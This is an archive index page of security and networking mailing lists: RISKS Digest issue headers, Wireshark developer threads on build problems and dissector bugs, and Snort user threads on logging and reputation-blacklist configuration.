ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/29.60.html>
The current issue can also...

Risks Digest 29.59 RISKS List Owner (Jun 28)
RISKS-LIST: Risks-Forum Digest Tuesday 28 June 2016 Volume 29 : Issue 59

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/29.59.html>
The current issue can also...

Risks Digest 29.58 RISKS List Owner (Jun 21)
RISKS-LIST: Risks-Forum Digest Tuesday 21 June 2016 Volume 29 : Issue 58

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/29.58.html>
The current issue can also...

Risks Digest 29.57 RISKS List Owner (Jun 18)
RISKS-LIST: Risks-Forum Digest Saturday 18 June 2016 Volume 29 : Issue 57

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/29.57.html>
The current issue can also...

Risks Digest 29.56 RISKS List Owner (Jun 15)
RISKS-LIST: Risks-Forum Digest Wednesday 15 June 2016 Volume 29 : Issue 56

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/29.56.html>
The current issue can...

Risks Digest 29.55 RISKS List Owner (Jun 07)
RISKS-LIST: Risks-Forum Digest Tuesday 7 June 2016 Volume 29 : Issue 55

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/29.55.html>
The current issue can also...

Risks Digest 29.54 RISKS List Owner (May 29)
RISKS-LIST: Risks-Forum Digest Sunday 29 May 2016 Volume 29 : Issue 54

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/29.54.html>
The current issue can also be...

Risks Digest 29.53 RISKS List Owner (May 20)
RISKS-LIST: Risks-Forum Digest Friday 20 May 2016 Volume 29 : Issue 53

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/29.53.html>
The current issue can also be...

Risks Digest 29.52 RISKS List Owner (May 10)
RISKS-LIST: Risks-Forum Digest Tuesday 10 May 2016 Volume 29 : Issue 52

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/29.52.html>
The current issue can also...

Risks Digest 29.51 RISKS List Owner (May 06)
RISKS-LIST: Risks-Forum Digest Friday 6 May 2016 Volume 29 : Issue 51

ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy

***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/29.51.html>
The current issue can be found...

BreachExchange — BreachExchange focuses on all things data breach. Topics include actual data breaches, cyber insurance, risk management, metrics and more. This archive includes its predecessor, the Data Loss news and discussion lists.

Open Source Tool Development

Wireshark — Discussion of the free and open source Wireshark network sniffer. No other sniffer (commercial or otherwise) comes close. This archive combines the Wireshark announcement, users, and developers mailing lists.

Are AEAD cyphers accepted for IKEv2 decryption table? Codrut Grosu (Aug 02)
Hi,

I'm working at a strongSwan plugin that will generate a IKEv2 decryption table for wireshark.

In IKEv2 decryption table(wireshark) at encryption algorithm field there are only the following algorithms:
"3DES[RFC2451]", "AES-CBC-128[RFC3602]", "AES-CBC-192[RFC3602]", "AES-CBC-256[RFC3602]" and "NULL[RFC2410]".

But strongSwan accepts AEAD cyphers like: AES_CCM_ICV8, AES_CCM_ICV12,...

Re: extcap.c does not build on SUSE 11.3. g_spawn_check_exit_status requires glib 2.34 Roland Knall (Aug 01)
Hi

No, I've uploaded a new patch to gerrit (
https://code.wireshark.org/review/16827), which removes the need for this
function. Just fyi, the min glib version to be supported is 2.14.0, and
although I'd appreciate a discussion to change that in the future, this
patch is a pretty simple fix.

regards
Roland

Re: make dist fails if built without Qt João Valverde (Aug 01)
Should be fixed in https://code.wireshark.org/review/#/c/16826/.

make dist fails if built without Qt Anders Broman (Aug 01)
make[1]: Leaving directory wireshark/trunk/ui/gtk'
(cd ui/qt && make top_distdir=../../wireshark-2.3.0 distdir=../../wireshark-2.3.0/ui/qt \
am__remove_distdir=: am__skip_length_check=: am__skip_mode_fix=: distdir)
make[1]: Entering directory `/home/ericsson/ewireshark/trunk/ui/qt'
LRELEASE wireshark_de.qm
/bin/sh: -silent: command not found
make[1]: *** [wireshark_de.qm] Error 127

Re: extcap.c does not build on SUSE 11.3. g_spawn_check_exit_status requires glib 2.34 Dario Lombardo (Aug 01)
This call exists from glib 2.34. We should add this version as minimum
requirement to build extcap.

On Mon, Aug 1, 2016 at 10:34 AM, Anders Broman <anders.broman () ericsson com>
wrote:

extcap.c does not build on SUSE 11.3. g_spawn_check_exit_status requires glib 2.34 Anders Broman (Aug 01)
Hi,
I get
extcap.c:842: undefined reference to `g_spawn_check_exit_status' on SUSe 11.3 with top of trunk.

Perhaps we should not build extcap on such an old system?

Regards
Anders

Re: Small bug in Modbus dissector exception information Dennis Luehring (Aug 01)
Am 01.08.2016 um 09:12 schrieb Jaap Keuter:

can't test it because the fix seems not be in latest
autobuild
https://wireshark.org/download/automated/win64/Wireshark-win64-2.3.0-140-gc611ede.exe

need to wait a little

Re: Small bug in Modbus dissector exception information Jaap Keuter (Aug 01)
Hi,

It's solved, but does that 'exception bit' get dissected?

Thanks,
Jaap

Re: Small bug in Modbus dissector exception information Dennis Luehring (Jul 30)
Done: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12693

Am 30.07.2016 um 08:40 schrieb Roland Knall:

Re: Small bug in Modbus dissector exception information Roland Knall (Jul 29)
Hi

Please report this in a bug-report on https://bugs.wireshark.org/bugzilla/
and attach a sample trace detailing the issue.

regards
Roland

Small bug in Modbus dissector exception information Dennis Luehring (Jul 29)
i use a "Live on the Bleeding Edge" Version
https://www.wireshark.org/download/automated/win64/Wireshark-win64-2.3.0-128-g98e8b26.exe

Sample Modbus-Exception-Code Response:
00 00 00 00 00 03 00 88 01

Modbus/TCP
Transaction Identifier: 0
Protocol Identifier: 0
Length: 3
Unit Identifier: 0
Function 8: Diagnostics. Exception: Illegal function
Function Code: Unknown (136) <-- !! the execption bit does not get...

Re: Question on payload reassembly John Dunlop (Jul 28)
Thanks Roland/Jeff for the responses, much appreciated.

So spent a bit of time debugging this and it looks like we fail sometimes to return a valid frag_msg from a call to
fragment_add_seq_check() when more_frags is set to false. In the case this happens I am currently failing to see much
difference in how the id and frag_number are controlled i.e. they are unique and in-sequence respectively. The failing
point is that we receive NULL from...

Re: Question on payload reassembly Roland Knall (Jul 28)
Hi

Just a short question, does your sequence counter repeat? If so, this can
be an issue. Also, for the openSAFETY dissector it only worked properly,
after I implemented fragment_add_seq_offset, so it will allways count
internally beginning with 0. You can see that in line 1272 of
packet-opensafety.c

regards,
Roland

Re: Question on payload reassembly Jeff Morriss (Jul 28)
Personally I use Google with a search string like:

what I'm interested in site://wireshark.org

Hmm, the reassembly routines should take care of this for you. See the
first 'if' statement in `fragment_add_seq_check_work()` (in
epan/reassemble.c): it checks if the current frame has already been
dissected and, if so, it skips reassembly and just returns what was stored
from the first pass.

It sounds like you are but are you...

Question on payload reassembly John Dunlop (Jul 28)
Hi,

Hope someone can help me with a question of payload reassembly.

First up, I have been trawling the e-mail archives to find an equivalent answer and was wondering if there is a better
way of searching the e-mail archives than opening up each individual month/year?

Now my actual question is that I am dissecting a packet payload which is split up into fragments with specific chunks
as:
Begin
Middle (no begin/end flagged, so can be...

Snort — Everyone's favorite open source IDS, Snort. This archive combines the snort-announce, snort-devel, snort-users, and snort-sigs lists.

Re: Snort log is blank Michael Iaconianni (Aug 02)
I want to clarify what I am trying to do. I can get alerts logged but I want every packet to be logged as well as the
alerts. Is there a way to do that?

From: Michael Iaconianni <michael.iaconianni () iaspecialists com<mailto:michael.iaconianni () iaspecialists com>>
Date: Tuesday, August 2, 2016 at 2:08 PM
To: "Al Lewis (allewi)" <allewi () cisco com<mailto:allewi () cisco com>>, "snort-users () lists...

Re: Snort log is blank Michael Iaconianni (Aug 02)
Thank you for getting back to me. Attached is my snort.conf file. And yes I traffic is coming into the device. IP
tables are also set up correctly. I can also run snort in other modes.

From: "Al Lewis (allewi)" <allewi () cisco com<mailto:allewi () cisco com>>
Date: Tuesday, August 2, 2016 at 1:36 PM
To: Michael Iaconianni <michael.iaconianni () iaspecialists com<mailto:michael.iaconianni () iaspecialists...

Re: snort black list issue anton van der leun (Aug 02)
Hello Hui

Oh that makes sense (DAQ BLACKLIST verdict, because that is what happening according to traces I have made:

Capture filter is: host == 5.157.87.137

did some pings and some telnet to port 80 of that ip address.

tried it several times, but what I saw was almost identical:

icmp's are always blocked

the first tcp SYN packet is always blocked.

EXAMPLE :

icmp (always no answer)

No. ...

Re: Snort log is blank Al Lewis (allewi) (Aug 02)
Hello,

Do you have the config to share?

If not..

1) are you able to run snort in another mode? (i.e. afpacket, dump etc).
2) is there traffic coming into the device?
3) is iptables setup correctly? (since you are using nfq) see the daq readme.

Albert Lewis
ENGINEER.SOFTWARE ENGINEERING
SOURCEfire, Inc. now part of Cisco
Email: allewi () cisco com<mailto:allewi () cisco com>

From: Michael Iaconianni <michael.iaconianni ()...

Snort log is blank Michael Iaconianni (Aug 02)
Hello,

I’m trying to run snort as an IDS. I use the following command to run snort:
snort -Q --daq nfq --daq-var device=br-lan --daq-var queue=1 -c /etc/snort/snort.conf -l log/ -D
However, when I check the log it is blank. When I try to read it with snort –r <logname> I get the following output

Error can’t initialize DAQ cap (-1) - truncated dump file; tried to read 4 file header bytes, only got 0. I’m guessing
theres a problem...

Re: snort black list issue Hui cao (Aug 02)
Reputation preprocessor is called after session preprocessor. You can
capture traffic for that session and look at what happened with that
session. There are lots of other traffic.

If the DAQ you used support BLACKLIST verdict, DAQ will block the whole
session, so snort will not received those packets.
If DAQ does not support BLACKLIST verdict, it should drop the first
packet. After that, packets in that session will be blocked by snort...

Snort Subscriber Rules Update 2016-08-02 Research (Aug 02)
Talos Snort Subscriber Rules Update

Synopsis:
This release adds and modifies rules in several categories.

Details:
Talos has added and modified multiple rules in the browser-ie,
exploit-kit, file-office, file-other, file-pdf, malware-cnc,
malware-other and server-webapp rule sets to provide coverage for
emerging threats from these technologies.

For a complete list of new and modified rules please see:

https://www.snort.org/advisories

Re: snort black list issue anton van der leun (Aug 02)
Hi Hui,

some more testing:

Aug 2 17:33:04 snort73 snort[2834]: ===============================================================================
Aug 2 17:33:04 snort73 snort[2834]: Reputation Preprocessor Statistics
Aug 2 17:33:04 snort73 snort[2834]: Total Memory Allocated: 2257540
Aug 2 17:33:04 snort73 snort[2834]: Number of packets blacklisted: 9
Aug 2 17:33:04 snort73 snort[2834]: Number of packets whitelisted: 7698
Aug 2...

Re: snort black list issue anton van der leun (Aug 02)
I forgot …

Snort.conf:

# -- Begin GID:136 Based Rules -- #

drop ( msg: "REPUTATION_EVENT_BLACKLIST"; sid: 1; gid: 136; rev: 1; metadata: rule-type preproc ;
classtype:bad-unknown; )

# alert ( msg: "REPUTATION_EVENT_WHITELIST"; sid: 2; gid: 136; rev: 1; metadata: rule-type preproc ;
classtype:bad-unknown; )

Van: Hui cao [mailto:huica () cisco com]
Verzonden: dinsdag 2 augustus 2016 16:43
Aan: anton van der...

Re: snort black list issue anton van der leun (Aug 02)
Hi Hui,

Yes, I checked that already.

The client of the test has ip address 192.168.63.1

The white-list is very short:

##callvoip

91.195.160.0/25

91.195.161.0/25

##microsoft

191.234.4.0/24

##ger schiedam glas:

163.158.245.128

##akama1

95.100.96.0/23

##dell download:

68.232.34.141

##alex:

37.59.121.224

##xenserver download:

95.100.97.40

##freenas:

64.62.136.60

192.168.63.100

##nagios

192.168.63.199

##ISPconfig...

Re: snort black list issue Hui cao (Aug 02)
Hi Anton,

You have packets that are whitelisted. Have you checked that either IP
is not in whitelist?

Do you have this defined in your rule?

drop ( msg: "REPUTATION_EVENT_BLACKLIST"; sid: 1; gid: 136; rev: 1; )

Best,
Hui.

------------------------------------------------------------------------------

Re: Please remove me Joel Esler (jesler) (Aug 02)
You may remove yourself by clicking on the link attached to the bottom of every email on this list to unsubscribe.

Please remove me Shayesteh G (Aug 02)
Please remove me from the list
------------------------------------------------------------------------------

Re: snort black list issue Hui cao (Aug 02)
Hi Anton,

Thanks a lot for the conf file.

Can you show me the snort exit statistics for tcp traffic?

ICMP is not tracked by session, so they will be called for each packet.
However, tcp and udp will be tracked and called only for the first
packet in the session.

Best,

Hui.

------------------------------------------------------------------------------

Re: snort black list issue anton van der leun (Aug 01)
Hi Hui,

Many thanks for reply.

"once per session" is new for me and does not ring a bell.

plse find below my preprocessor configuration:

= = = = = = = = = = = = = = = = = = = = =

###################################################
# Step #5: Configure preprocessors
# For more information, see the Snort Manual, Configuring Snort - Preprocessors
###################################################

# GTP Control Channle...

More Lists

Related Resources

We're always looking for great network security related lists to archive. To suggest one, mail Fyodor.